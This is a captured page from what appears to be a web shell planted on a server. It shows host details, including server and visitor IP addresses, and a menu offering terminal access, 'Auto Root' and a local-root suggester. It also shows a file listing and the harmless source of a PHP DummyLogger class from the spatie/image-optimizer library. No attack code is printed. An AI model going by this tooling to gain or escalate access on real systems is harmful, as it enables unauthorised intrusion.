Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.116.42.143
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
spatie /
image-optimizer /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Optimizers
[ DIR ]
drwxr-xr-x
2021-04-22 09:00
DummyLogger.php
764
B
-rw-r--r--
2021-04-22 09:00
Image.php
716
B
-rw-r--r--
2021-04-22 09:00
Optimizer.php
943
B
-rw-r--r--
2021-04-22 09:00
OptimizerChain.php
2.53
KB
-rw-r--r--
2021-04-22 09:00
OptimizerChainFactory.php
1.48
KB
-rw-r--r--
2021-04-22 09:00
Save
Rename
<?php namespace Spatie\ImageOptimizer; use Psr\Log\LoggerInterface; class DummyLogger implements LoggerInterface { public function emergency($message, array $context = []) { } public function alert($message, array $context = []) { } public function critical($message, array $context = []) { } public function error($message, array $context = []) { } public function warning($message, array $context = []) { } public function notice($message, array $context = []) { } public function info($message, array $context = []) { } public function debug($message, array $context = []) { } public function log($level, $message, array $context = []) { } }